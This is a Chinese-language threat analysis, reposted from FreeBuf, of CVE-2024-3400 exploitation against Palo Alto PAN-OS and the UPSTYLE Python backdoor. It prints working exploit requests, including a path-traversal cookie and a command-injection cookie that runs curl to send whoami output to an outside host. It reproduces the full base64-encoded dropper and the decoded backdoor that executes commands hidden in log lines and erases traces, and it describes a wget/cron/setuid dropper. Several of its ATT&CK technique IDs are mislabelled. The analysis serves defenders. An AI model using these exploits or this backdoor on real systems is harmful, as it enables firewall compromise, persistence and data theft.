Palo Alto Networks命令注入漏洞攻击后利用UPSTYLE后门分析

admin 2024年7月3日13:02:58评论7 views字数 12056阅读40分11秒阅读模式

更多全球网络安全资讯尽在邑安全

一、前言

此文章是关于Palo Alto Networks(CVE-2024-3400 )命令注入漏洞攻击后利用UPSTYLE后门分析,由第三方公开漏洞的概念POC后,APT组织以及某些工具团体迅速利用起来攻击各国有关公网暴露面的 Palo Alto Networks设备,直到5月30日对存在CVE-2024-3400漏洞的Palo Alto Networks增加了出厂重置 (EFR) 程序,可抵御任何潜在的后漏洞持久性技术。

二、利用

该漏洞最早期在CVE官方记录时间是2024年4月5日,随后在4月12日被其它漏洞库记录CVE-2024-3400 是 Palo Alto Networks PAN-OS 软件中 GlobalProtect 功能中的一个命令注入漏洞,允许未经身份验证的攻击者以 root 权限在防火墙上执行任意代码。该漏洞的 CVSS 评分为 10 (严重),并且已在野外被积极利用。

该漏洞是由于允许通过路径遍历字符串任意写入文件以及在会话 ID 句柄中设置命令注入造成的,攻击者可以通过编辑其请求的 Cookie 参数来更改会话 SESSID的内容来实现漏洞利用。

1、文件创建:

POST /ssl-XXX/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/XXXweb/sslXXXdocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Palo Alto Networks命令注入漏洞攻击后利用UPSTYLE后门分析

成功添加一个hellome1337.txt文本文件,还要可以通过Cookie来进行命令注入。

2、命令注入

上面可以在拥有足够权限下任意创建文件,通过修改Cookie服务路径将抓取的cron定时运行,来实现注入,可能在某些版本可能不同。

POST /ssl-XXX/hipreport.esp HTTP/1.1
Host: 127.0.01
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
python3 -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
192.168.50.226 - - [23/Jun/2024 17:36:17] "GET /?user=root HTTP/1.1" 200 -

这将在“device_telemetry/hour”目录中创建一个空文件,该文件每小时处理一次。日志服务将每小时对目录中的所有请求执行操作,并且由于未能清理文件名,将在文件名中执行命令,在上面的示例中,该命令正在向攻击者域发出请求。

三、UPSTYLE 后门威胁分析

Palo Alto Networks命令注入漏洞攻击后利用UPSTYLE后门分析

UPSTYLE 样本一:

MD5 0c1554888ce9ed0da1583dbdf7b31651

SHA-1 988fc0d23e6e30c2c46ccec9bbff50b7453b8ba9

SHA-256 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

首次在野外发现 2024-04-12 12:57:08 UTC

首次提交 2024-04-12 21:26:18 UTC

——————————————————————

引擎:37/ 65

Palo Alto Networks命令注入漏洞攻击后利用UPSTYLE后门分析

下载样本后发现py文件的systempth = "/usr/lib/python3.6/site-packages/system.pth",而且定义了一个变量systempth,保存了system.pth文件的路径。下图我们还可以看到一段 Base64 编码,编码代码注入到 Python 环境的system.pth文件中,并在执行后删除当前自身脚本。

Palo Alto Networks命令注入漏洞攻击后利用UPSTYLE后门分析

import os,base64,time
systempth = "/usr/lib/python3.6/site-packages/system.pth"
with open(systempth,'wb') as f:
f.write(b'''import base64;exec(base64.b64decode(b"CgoKZGVmIGNoZWNrKCk6CiAgICBpbXBvcnQgb3Msc3VicHJvY2Vzcyx0aW1lLHN5cwoKCiAgICBkZWYgc3RhcnRfcHJvY2VzcygpOgogICAgICAgIGltcG9ydCBiYXNlNjQKICAgICAgICBmdW5jdGlvbmNvZGUgPSBiIlpHVm1JRjlmYldGcGJpZ3BPZzBLSUNBZ0lHbHRjRzl5ZENCMGFISmxZV1JwYm1jc2RHbHRaU3h2Y3l4eVpTeGlZWE5sTmpRTkNnMEtEUW9OQ2lBZ0lDQmtaV1lnY21WemRHOXlaU2hqYzNOZmNHRjBhQ3hqYjI1MFpXNTBMR0YwYVcxbExHMTBhVzFsS1RvTkNpQWdJQ0FnSUNBZ2FXMXdiM0owSUc5ekxIUnBiV1VOQ2lBZ0lDQWdJQ0FnZEdsdFpTNXpiR1ZsY0NneE5Ta05DaUFnSUNBZ0lDQWdkMmwwYUNCdmNHVnVLR056YzE5d1lYUm9MQ2QzSnlrZ1lYTWdaam9OQ2lBZ0lDQWdJQ0FnSUNBZ0lHWXVkM0pwZEdVb1kyOXVkR1Z1ZENrTkNpQWdJQ0FnSUNBZ2IzTXVkWFJwYldVb1kzTnpYM0JoZEdnc0tHRjBhVzFsTEcxMGFXMWxLU2tOQ2lBZ0lDQWdJQ0FnRFFvTkNpQWdJQ0FnSUNBZ0RRb2dJQ0FnWkdWbUlGOWZhWE5mZDJodmJHVmZhRzkxY2lncE9nMEtJQ0FnSUNBZ0lDQm1jbTl0SUdSaGRHVjBhVzFsSUdsdGNHOXlkQ0JrWVhSbGRHbHRaUTBLSUNBZ0lDQWdJQ0JqZFhKeVpXNTBYM1JwYldVZ1BTQmtZWFJsZEdsdFpTNXViM2NvS1M1MGFXMWxLQ2tOQ2lBZ0lDQWdJQ0FnY21WMGRYSnVJR04xY25KbGJuUmZkR2x0WlM1dGFXNTFkR1VnSVQwZ01DQmhibVFnWTNWeWNtVnVkRjkwYVcxbExuTmxZMjl1WkNBOVBTQXdEUW9nSUNBZ1kzTnpYM0JoZEdnZ1BTQW5MM1poY2k5aGNIQjNaV0l2YzNOc2RuQnVaRzlqY3k5bmJHOWlZV3d0Y0hKdmRHVmpkQzl3YjNKMFlXd3ZZM056TDJKdmIzUnpkSEpoY0M1dGFXNHVZM056SncwS0lDQWdJR052Ym5SbGJuUWdQU0J2Y0dWdUtHTnpjMTl3WVhSb0tTNXlaV0ZrS0NrTkNpQWdJQ0JoZEdsdFpUMXZjeTV3WVhSb0xtZGxkR0YwYVcxbEtHTnpjMTl3WVhSb0tRMEtJQ0FnSUcxMGFXMWxQVzl6TG5CaGRHZ3VaMlYwYlhScGJXVW9ZM056WDNCaGRHZ3BEUW9OQ2lBZ0lDQjNhR2xzWlNCVWNuVmxPZzBLSUNBZ0lDQWdJQ0IwY25rNkRRb2dJQ0FnSUNBZ0lDQWdJQ0JUU0VWTVRGOVFRVlJVUlZKT0lEMGdKMmx0WjF4YktGdGhMWHBCTFZvd0xUa3JMejFkS3lsY1hTY05DaUFnSUNBZ0lDQWdJQ0FnSUd4cGJtVnpJRDBnVzEwTkNpQWdJQ0FnSUNBZ0lDQWdJRmRTU1ZSRlgwWk1RVWNnUFNCR1lXeHpaUTBLSUNBZ0lDQWdJQ0FnSUNBZ1ptOXlJR3hwYm1VZ2FXNGdiM0JsYmlnaUwzWmhjaTlzYjJjdmNHRnVMM056Ykhad2JsOXVaM2hmWlhKeWIzSXViRzluSWl4bGNuSnZjbk05SW1sbmJtOXlaU0lwTG5KbFlXUnNhVzVsY3lncE9nMEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lISnpkQ0E5SUhKbExuTmxZWEpqYUNoVFNFVk1URjlRUVZSVVJWSk9MR3hwYm1VcERRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2FXWWdjbk4wT2cwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQlhVa2xVUlY5R1RFRkhJRDBnVkhKMVpRMEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JqYldRZ1BTQmlZWE5sTmpRdVlqWTBaR1ZqYjJSbEtISnpkQzVuY205MWNDZ3hLU2t1WkdWamIyUmxLQ2tOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2RISjVPZzBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdiM1YwY0hWMElEMGdiM011Y0c5d1pXNG9ZMjFrS1M1eVpXRmtLQ2tOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSGRwZEdnZ2IzQmxiaWhqYzNOZmNHRjBhQ3dpWVNJcElHRnpJR1k2RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1ppNTNjbWwwWlNnaUx5b2lLMjkxZEhCMWRDc2lLaThpS1EwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQmxlR05sY0hRZ1JYaGpaWEIwYVc5dUlHRnpJR1U2RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0J3WVhOekRRb05DaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnWTI5dWRHbHVkV1VOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JzYVc1bGN5NWhjSEJsYm1Rb2JHbHVaU2tOQ2lBZ0lDQWdJQ0FnSUNBZ0lHbG1JRmRTU1ZSRlgwWk1RVWM2RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnWVhScGJXVTliM011Y0dGMGFDNW5aWFJoZEdsdFpTZ2lMM1poY2k5c2IyY3ZjR0Z1TDNOemJIWndibDl1WjNoZlpYSnliM0l1Ykc5bklpa05DaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQnRkR2x0WlQxdmN5NXdZWFJvTG1kbGRHMTBhVzFsS0NJdmRtRnlMMnh2Wnk5d1lXNHZjM05zZG5CdVgyNW5lRjlsY25KdmNpNXNiMmNpS1EwS0RRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2QybDBhQ0J2Y0dWdUtDSXZkbUZ5TDJ4dlp5OXdZVzR2YzNOc2RuQnVYMjVuZUY5bGNuSnZjaTVzYjJjaUxDSjNJaWtnWVhNZ1pqb05DaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnWmk1M2NtbDBaV3hwYm1WektHeHBibVZ6S1EwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUc5ekxuVjBhVzFsS0NJdmRtRnlMMnh2Wnk5d1lXNHZjM05zZG5CdVgyNW5lRjlsY25KdmNpNXNiMmNpTENoaGRHbHRaU3h0ZEdsdFpTa3BEUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhVzF3YjNKMElIUm9jbVZoWkdsdVp3MEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lIUm9jbVZoWkdsdVp5NVVhSEpsWVdRb2RHRnlaMlYwUFhKbGMzUnZjbVVzWVhKbmN6MG9ZM056WDNCaGRHZ3NZMjl1ZEdWdWRDeGhkR2x0WlN4dGRHbHRaU2twTG5OMFlYSjBLQ2tOQ2lBZ0lDQWdJQ0FnWlhoalpYQjBPZzBLSUNBZ0lDQWdJQ0FnSUNBZ2NHRnpjdzBLSUNBZ0lDQWdJQ0IwYVcxbExuTnNaV1Z3S0RJcERRb05DZzBLYVcxd2IzSjBJSFJvY21WaFpHbHVaeXgwYVcxbERRcDBhSEpsWVdScGJtY3VWR2h5WldGa0tIUmhjbWRsZEQxZlgyMWhhVzRwTG5OMFlYSjBLQ2tOQ2cwSyIKICAgICAgICBleGVjKGJhc2U2NC5iNjRkZWNvZGUoZnVuY3Rpb25jb2RlKSkgICAgICAgIAoKICAgIGlmIGIiL3Vzci9sb2NhbC9iaW4vbW9uaXRvciBtcCIgaW4gb3BlbigiL3Byb2Mvc2VsZi9jbWRsaW5lIiwicmIiKS5yZWFkKCkucmVwbGFjZShiIlx4MDAiLGIiICIpIDoKICAgICAgICB0cnk6CiAgICAgICAgICAgIHN0YXJ0X3Byb2Nlc3MoKQogICAgICAgIGV4Y2VwdCBLZXlib2FyZEludGVycnVwdCBhcyBlOgogICAgICAgICAgICBwcmludChlKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb24gYXMgZToKICAgICAgICAgICAgcHJpbnQoZSkKICAgICAgICByZXR1cm4gVHJ1ZQogICAgZWxzZToKICAgICAgICByZXR1cm4gRmFsc2UgCgoKZGVmIHByb3RlY3QoKToKICAgIGltcG9ydCBvcyxzaWduYWwKICAgIHN5c3RlbXB0aCA9ICIvdXNyL2xpYi9weXRob24zLjYvc2l0ZS1wYWNrYWdlcy9zeXN0ZW0ucHRoIgogICAgY29udGVudCA9IG9wZW4oc3lzdGVtcHRoKS5yZWFkKCkKICAgICMgb3MudW5saW5rKF9fZmlsZV9fKQogICAgZGVmIHN0b3Aoc2lnLGZyYW1lKToKICAgICAgICBpZiBub3Qgb3MucGF0aC5leGlzdHMoc3lzdGVtcHRoKToKICAgICAgICAgICAgd2l0aCBvcGVuKHN5c3RlbXB0aCwidyIpIGFzIGY6CiAgICAgICAgICAgICAgICBmLndyaXRlKGNvbnRlbnQpCgogICAgc2lnbmFsLnNpZ25hbChzaWduYWwuU0lHVEVSTSxzdG9wKQoKCnByb3RlY3QoKQpjaGVjaygpCg=="))''')
atime=os.path.getatime(os.__file__)
mtime=os.path.getmtime(os.__file__)
os.utime(systempth,(atime,mtime))
os.unlink(__file__)
import glob
os.unlink(glob.glob("/opt/pancfg/mgmt/licenses/PA_VM`*")[0])

Palo Alto Networks命令注入漏洞攻击后利用UPSTYLE后门分析

回到正文,我对编码的内容进行解码:

Palo Alto Networks命令注入漏洞攻击后利用UPSTYLE后门分析

代码功能分析:

  • check()函数:

    • 该函数首先检查进程命令行中是否包含/usr/local/bin/monitor mp,这可能是一个识别目标系统的特定条件,如果满足,则执行后门代码。

    • 如果命令行中包含该字符串,则调用start_process()函数。

    • 否则,返回False,表示目标系统不符合要求。

  • start_process()函数:

    • 该函数使用base64.b64decode()解码一个 Base64 编码的代码片段。这个代码片段包含了恶意代码的实际内容。

    • 然后使用exec()函数执行解码后的代码片段,意味着Base64 编码的内容在解码后的代码片段将被执行。

然后在对编码内容进行解码,这个路径/var/www/sslXXX有敏感字,可以看图片XXX的替代:

Palo Alto Networks命令注入漏洞攻击后利用UPSTYLE后门分析

def __main__():
import threading,time,os,re,base64


def restore(css_path,content,atime,mtime):
import os,time
time.sleep(15)
with open(css_path,'w') as f:
f.write(content)
os.utime(css_path,(atime,mtime))


def _is_whole_hour():
from datetime import datetime
current_time = datetime.now().time()
return current_time.minute == 0 and current_time.second == 0


css_path = '/var/www/sslXXX/global-protect/portal/css/bootstrap.min.css'
content = open(css_path).read()
atime=os.path.getatime(css_path)
mtime=os.path.getmtime(css_path)


while True:
try:
SHELL_PATTERN = r'img[([a-z]-z][-z]-9+/=])]'
lines = []
WRITE_FLAG = False
for line in open("/var/log/pan/sslXXX_ngx_error.log",errors="ignore").readlines():
rst = re.search(SHELL_PATTERN,line)
if rst:
WRITE_FLAG = True
cmd = base64.b64decode(rst.group(1)).decode()
try:
output = os.popen(cmd).read()
with open(css_path,"a") as f:
f.write("/*"+output+"*/")
except Exception as e:
pass
continue
lines.append(line)
if WRITE_FLAG:
atime = os.path.getatime("/var/log/pan/sslXXX_ngx_error.log")
mtime = os.path.getmtime("/var/log/pan/sslXXX_ngx_error.log")
with open("/var/log/pan/sslXXX_ngx_error.log","w") as f:
f.writelines(lines)
os.utime("/var/log/pan/sslXXX_ngx_error.log",(atime,mtime))
import threading
threading.Thread(target=restore,args=(css_path,content,atime,mtime)).start()
except:
pass
time.sleep(2)


import threading,time
threading.Thread(target=__main__).start()

代码功能分析:

  • 后门代码:后门代码的功能是读取防火墙的日志文件[snip]/sslXXX_ngx_error.log,并寻找包含命令的日志行。命令以img[Base64_encoded_command]的格式嵌入在日志文件中。

  • 执行命令:恶意软件会对命令进行 Base64 解码,并使用os.popen方法执行该命令。命令执行结果会被写入 CSS 文件[snip]/css/bootstrap.min.css

  • 痕迹清除:恶意软件会创建一个线程,在 15 秒后将/css/bootstrap.min.css文件恢复到原始状态,并设置其访问时间和修改时间为原始值。

样本一分析总结:

样本一的后门在MITRE ATT&CK 框架中的技术为以下,主要攻击步骤:

  1. 文件植入 (T1089):代码将一个 Base64 编码的恶意脚本写入到系统路径/usr/lib/python3.6/site-packages/system.pth中。system.pth文件是 Python 解释器在导入模块时会搜索的路径文件,将恶意脚本写入其中可以保证脚本在 Python 程序启动时被自动加载执行。

  2. 持久化 (T1011):代码通过修改system.pth文件的访问时间和修改时间,使其看起来像系统文件,以掩盖恶意脚本的存在。

  3. 进程注入 (T1055):代码通过检查当前进程的命令行参数,判断是否以monitor mp作为参数启动。如果是,则执行恶意脚本,实现进程注入。

  4. 命令和脚本解释器 (T1059):代码利用 Python 的exec函数执行 Base64 解码后的恶意脚本。

  5. 隐藏技术 (T1070):代码通过删除自身文件__file__和一个位于/opt/pancfg/mgmt/licenses/PA_VM的文件,以减少自身存在痕迹。

  6. 数据编码 (T1071.001):代码使用 Base64 对恶意脚本进行编码,以逃避简单的静态分析。

  7. 隐藏文件和目录 (T1027):代码通过将恶意脚本写入system.pth文件,并修改其访问时间和修改时间,以隐藏其存在。

  8. 权限提升 (T1068):代码中的monitor mp参数可能与系统进程相关,如果用户以管理员权限运行该脚本,则恶意脚本也可能获得管理员权限。

  9. 后门安装 (T1547.001):代码通过将恶意脚本写入system.pth文件,并在特定条件下执行,实现了在系统中植入后门。

UPSTYLE后门整体执行流程:

解码后的恶意脚本是一个 Python 脚本,它监控日志文件/var/log/pan/sslxxx_ngx_error.log,并从其中提取 Base64 编码的命令。执行这些命令后,脚本将结果写入 CSS 文件/var/www/sslxxx/global-protect/portal/css/bootstrap.min.css中,并恢复日志文件到最初的状态。

攻击目标:

  • 获取系统权限:通过执行恶意命令,攻击者可以获取系统权限,从而进行进一步的攻击。

  • 窃取数据:攻击者可以利用恶意命令窃取系统中的敏感数据,例如用户密码、配置文件等。

  • 控制系统:攻击者可以利用恶意命令控制系统,例如安装其他恶意软件、修改系统配置等。

UPSTYLE 样本二:

MD5 8e5bc98507aa6df20edecd43961f50e5

SHA-1 3f7647e492399e7d71703217cc353ec496c0ed64

SHA-256 668378a66cde261c3d30c417439d3de09d52fd1d4b59c0477f73f3a452530c8c

首次提交 2024-04-23 13:12:39 UTC

——————————————————————

引擎:20/65

Palo Alto Networks命令注入漏洞攻击后利用UPSTYLE后门分析这个流程和样本一是一致的,样本一做了base64编码引擎报37/ 65这个报20/65,这种攻击者用的多,或者被人往virustotal丢多了,引擎差就大了!

Palo Alto Networks命令注入漏洞攻击后利用UPSTYLE后门分析

类似样本分析

这个我是在推上看见的,根据代码特征上面并不是一样的,似乎这个py样本并没有被公开,而且这个看起来有较强的逃避检测性,下图是使用Github托管公共CVE-2024-3400.py,通过下图的Py代码涉及到反弹Shell操作,而这份公共POC的相关IOC并没有被公开,有人直接对其项目托管路径进行打码!首先有关的POC文件是通过一定检测方式是否存在漏洞,存在漏洞然后执行安装UPSTYLE 后门。

Palo Alto Networks命令注入漏洞攻击后利用UPSTYLE后门分析在底部的main函数,这条命令使用了 curl 命令从 GitHub 上下载一个脚本 git.sh 到 /Public/git.sh 目录,并设置其为可执行。然后,在后台执行该脚本,并将输出重定向到空设备。

os.system(curl -sSL https://raw.githubusercontent.com/xxxxxxxxxxxxxxx/xxx.sh) -o -/Public/git.sh ..........

Palo Alto Networks命令注入漏洞攻击后利用UPSTYLE后门分析

代码分析:

  1. 下载恶意程序:

    • WGET=$(which wget): 找到wget命令的路径并保存到WGET变量。

    • URL="https://github.com/<username>/<repository>/main/log": 设置要下载的恶意程序的 URL。

    • BACKDOOR=$RANDOM: 生成一个随机数并保存到BACKDOOR变量,用于创建随机文件名。

    • BACKDOOR=".${BACKDOOR}": 在随机数前面添加一个点,使其成为隐藏文件。

    • $WGET -q --no-check-certificate "${URL}" -O <下载路径>: 使用wget下载恶意程序,并将其保存到指定路径,同时禁用证书检查。

  2. 设置权限和持久化:

    • chmod u+s <下载路径>: 将下载的恶意程序设置为 setuid 程序,使其在执行时拥有文件所有者的权限 (root)。

    • 其他步骤与普通用户权限类似,只是下载路径和持久化任务的设置位置不同。

    • chmod +x <下载路径>: 将下载的恶意程序设置为可执行。

    • crontab -l > temp: 将当前用户的crontab任务列表保存到临时文件temp

    • echo "@reboot sleep 30; <下载路径> 2>&1" >> temp_cron: 将一条新的任务添加到temp_cron文件中,该任务会在系统重启 30 秒后执行下载的恶意程序,并将程序的输出重定向到标准错误输出。

    • crontab temp_cron: 用修改后的temp_cron文件覆盖当前用户的crontab任务列表。

    • rm temp cron: 删除临时文件。

    • 普通用户权限:

    • root 用户权限:

上面的一个类似样本的利用代码使用 ATT&CK 框架以下技术:

  • 初始访问 (Initial Access):

    • T1598.003 - Drive-by Compromise: 代码中的 URL 指向一个下载恶意程序的链接,暗示攻击者可能利用了网站漏洞或其他方式诱使用户访问该链接,从而实现恶意程序的初始下载和执行。

  • 执行 (Execution):

    • T1059.003 - Unix Shell: 脚本使用 bash 脚本执行命令,包括下载、修改文件权限和设置持久化机制。

    • T1053.005 - Scheduled Task/Job: Cron: 攻击者利用crontab设置定时任务,实现在系统重启后自动执行恶意程序的目的。

  • 持久化 (Persistence):

    • T1053 - Scheduled Task/Job: 通过crontab设置定时任务,使恶意程序在系统重启后自动运行,维持对系统的持久化访问。

  • 权限提升 (Privilege Escalation):

    • T1068 - Abuse Elevation Control Mechanism: 脚本检查当前用户是否为 root,如果是则将恶意程序设置为 setuid 程序,利用操作系统的机制提升程序权限。

  • 防御规避 (Defense Evasion):

    • T1562.001 - Impair Defenses: Disable or Modify System Firewall: 代码中没有明确体现对防火墙的禁用或修改操作,但攻击者在获得系统权限后很可能会进行此类操作,以避免被检测和阻止。

    • T1564.001 - Hide Artifacts: Hidden Files and Directories: 脚本将下载的恶意程序文件名添加.前缀,使其成为隐藏文件,试图躲避用户和安全软件的检测。

原文来自: freebuf.com

原文链接: https://www.freebuf.com/articles/endpoint/404235.html

原文始发于微信公众号(邑安全):Palo Alto Networks命令注入漏洞攻击后利用UPSTYLE后门分析

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月3日13:02:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Palo Alto Networks命令注入漏洞攻击后利用UPSTYLE后门分析https://cn-sec.com/archives/2913473.html

发表评论

匿名网友 填写信息